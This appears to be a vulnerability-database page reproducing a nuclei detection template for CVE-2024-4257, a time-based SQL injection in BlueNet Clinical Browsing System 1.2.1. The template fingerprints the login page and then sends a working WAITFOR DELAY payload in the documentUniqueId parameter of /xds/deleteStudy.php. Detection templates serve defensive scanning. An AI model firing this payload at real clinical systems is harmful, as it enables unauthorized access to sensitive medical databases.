Lucene search
K

BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

BlueNet Technology Clinical Browsing System 1.2.1 Sql Injection vulnerability affects /xds/deleteStudy.ph

Related
Refs
Code
id: CVE-2024-4257

info:
  name: BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection
  author: s4e-io
  severity: medium
  description: |
    A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.
  impact: |
    Authenticated attackers can execute time-based SQL injection to extract sensitive database information.
  remediation: |
    Update BlueNet Technology Clinical Browsing System to a version later than 1.2.1 that patches the SQL injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4257
    - https://github.com/GAO-UNO/cve/blob/main/sql.md
    - https://vuldb.com/?submit.321338
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2024-4257
    cwe-id: CWE-89
    epss-score: 0.12051
    epss-percentile: 0.95629
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="LANWON-临床浏览系统"
  tags: time-based-sqli,cve,cve2024,sqli,blunet,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"<title>临床浏览</title>")'
          - 'contains(header,"text/html")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - 'contains(header,"text/html")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100d58f419fa2a6301713cc9f35032f376a35db857d8883577ae5711688e6877c56022070c3c344a159986fd821bdb2d21d52361b76fea0dbe3b14dd76fdaef5ea9e589:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.16.3 - 6.5
CVSS 26.5
CVSS 36.3
EPSS0.12051
SSVC
26